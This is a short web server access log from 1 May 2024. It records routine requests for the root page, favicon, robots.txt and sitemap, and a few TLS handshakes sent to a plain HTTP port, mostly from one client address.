152.32.198.168 - - [01/May/2024:05:39:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:39:47 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:39:47 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
95.215.233.248 - - [01/May/2024:05:40:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
152.32.198.168 - - [01/May/2024:05:40:44 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:40:54 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:41:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:41:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:41:09 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:41:09 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:41:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:41:20 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:41:20 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:41:27 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:41:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:41:51 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
